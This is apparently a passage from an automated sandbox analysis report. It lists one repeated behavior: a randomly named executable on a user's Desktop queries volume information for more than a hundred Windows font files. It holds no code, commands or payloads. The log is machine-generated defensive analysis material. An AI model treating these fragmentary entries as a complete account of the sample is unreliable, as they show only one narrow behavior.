Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
